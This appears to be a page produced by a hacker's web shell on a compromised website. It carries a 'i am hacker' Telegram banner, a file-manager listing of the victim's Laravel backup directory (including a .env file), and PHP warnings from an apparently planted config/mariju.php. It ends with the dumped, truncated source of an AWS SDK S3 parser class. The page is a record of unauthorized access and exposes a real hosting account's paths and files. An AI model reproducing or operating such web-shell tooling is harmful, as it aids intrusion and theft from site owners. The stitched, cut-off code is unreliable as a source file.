telegram : @iamdarkcomedy i am hacker

path :/home/bisorgosof24/public_html/Backup23122024

upload file:

List of files:

name file size edit permission action
.env2733 KBDecember 22 2024 06:20:070644
404.html58370 KBNovember 20 2024 15:32:220644
502.html58368 KBNovember 20 2024 15:32:220644
Modules-December 11 2024 21:02:560755
README.md4158 KBFebruary 14 2023 12:31:560644
app-December 11 2024 17:57:480755
artisan1686 KBFebruary 14 2023 12:31:560644
bootstrap-December 11 2024 20:23:360755
composer.json3761 KBDecember 11 2024 22:15:000644
composer.lock512048 KBDecember 11 2024 22:13:280644
config-June 15 2025 02:09:360755
database-December 05 2024 20:18:120755
dfsdf dfds fd fds findex.html1420 KBNovember 20 2024 15:32:240644
error_log26231174 KBJuly 19 2025 02:36:200644
firoz-December 23 2024 13:24:460755
index.php1667 KBDecember 14 2024 05:20:360644
lang-December 11 2024 21:02:480755
modules_statuses.json472 KBNovember 20 2024 15:32:240644
mpos-March 31 2025 02:36:310755
package.json226 KBFebruary 14 2023 12:31:560644
phpunit.xml1146 KBFebruary 14 2023 12:31:560644
public-March 31 2025 02:36:310755
resources-December 11 2024 21:10:220755
routes-June 15 2025 02:09:310755
storage-December 11 2024 21:12:440755
tests-December 05 2024 20:18:120755
vendor-December 11 2024 22:13:300755
vite.config.js263 KBFebruary 14 2023 12:31:560644

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 227

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 228

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 229

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 230
protocolParser = $protocolParser; $this->errorParser = $errorParser; $this->exceptionClass = $exceptionClass; $this->s3ResultMutators = []; } /** * Parses a S3 response. * * @param CommandInterface $command The command that originated the request. * @param ResponseInterface $response The response received from the service. * * @return ResultInterface|null */ public function __invoke( CommandInterface $command, ResponseInterface $response ):? ResultInterface { // Check first if the response is an error $this->parse200Error($command, $response); try { $parseFn = $this->protocolParser; $result = $parseFn($command, $response); } catch (ParserException $e) { // Parsing errors will be considered retryable. throw new $this->exceptionClass( "Error parsing response for {$command->getName()}:" . " AWS parsing error: {$e->getMessage()}", $command, ['connection_error' => true, 'exception' => $e], $e ); } return $this->executeS3ResultMutators($result, $command, $response); } /** * Tries to parse a 200 response as an error from S3. * If the parsed result contains a code and message then that means an error * was found, and hence an exception is thrown with that error. * * @param CommandInterface $command * @param ResponseInterface $response * * @return void */ private function parse200Error( CommandInterface $command, ResponseInterface $response ): void { // This error parsing should be just for 200 error responses // and operations where its output shape does not have a streaming // member. if (200 !== $response->getStatusCode() || !$this->shouldBeConsidered200Error($command->getName())) { return; } // To guarantee we try the error parsing just for an Error xml response. if (!$this->isFirstRootElementError($response->getBody())) { return; } try { $errorParserFn = $this->errorParser; $parsedError = $errorParserFn($response, $command); } catch (ParserException $e) { // Parsing errors will be considered retryable. $parsedError = [ 'code' => 'ConnectionError', 'message' => "An error connecting to the service occurred" . " while performing the " . $command->getName() . " operation." ]; } if (isset($parsedError['code']) && isset($parsedError['message'])) { throw new $this->exceptionClass( $parsedError['message'], $command, [ 'connection_error' => true, 'code' => $parsedError['code'], 'message' => $parsedError['message'] ] ); } } /** * Checks if a specific operation should be considered * a s3 200 error. Operations where any of its output members * has a streaming or httpPayload trait should be not considered. * * @param $commandName * * @return bool */ private function shouldBeConsidered200Error($commandName): bool { $operation = $this->api->getOperation($commandName); $output = $operation->getOutput(); foreach ($output->getMembers() as $_ => $memberProps) { if (!empty($memberProps['eventstream']) || !empty($memberProps['streaming'])) { return false; } } return true; } /** * Checks if the root element of the response body is "Error", which is * when we should try to parse an error from a 200 response from s3. * It is recommended to make sure the stream given is seekable, otherwise * the rewind call will cause a user warning. * * @param StreamInterface $responseBody * * @return bool */ private function isFirstRootElementError(StreamInterface $responseBody): bool { static $pattern = '/<\?xml version="1\.0" encoding="UTF-8"\?>\s*/'; // To avoid performance overhead in large streams $reducedBodyContent = $responseBody->read(64); $foundErrorElement = preg_match($pattern, $reducedBodyContent); // A rewind is needed because the stream is partially or entirely consumed // in the previous read operation. $responseBody->rewind(); return $foundErrorElement; } /** * Execute mutator implementations over a result. * Mutators are logics that modifies a result. * * @param ResultInterface $result * @param CommandInterface $command * @param ResponseInterface $response * * @return ResultInterface */ private function executeS3ResultMutators( ResultInterface $result, CommandInterface $command, ResponseInterface $response ): ResultInterface { foreach ($this->s3ResultMutators as $mutator) { $result = $mutator($result, $command, $response); } return $result; } /** * Adds a mutator into the list of mutators. * * @param string $mutatorName * @param S3ResultMutator $s3ResultMutator * @return void */ public function addS3ResultMutator( string $mutatorName, S3ResultMutator $s3ResultMutator ): void { if (isset($this->s3ResultMutators[$mutatorName])) { trigger_error( "The S3 Result Mutator {$mutatorName} already exists!", E_USER_WARNING ); return; } $this->s3ResultMutators[$mutatorName] = $s3ResultMutator; } /** * Removes a mutator from the mutator list. * * @param string $mutatorName * @return void */ public function removeS3ResultMutator(string $mutatorName): void { if (!isset($this->s3ResultMutators[$mutatorName])) { trigger_error( "The S3 Result Mutator {$mutatorName} does not exist!", E_USER_WARNING ); return; } unset($this->s3ResultMutators[$mutatorName]); } /** * Returns the list of result mutators available. * * @return array */ public function getS3ResultMutators(): array { return $this->s3ResultMutators; } public function parseMemberFromStream( StreamInterface $stream, StructureShape $member, $response ) { return $this->protocolParser->parseMemberFromStream( $stream, $member, $response ); } }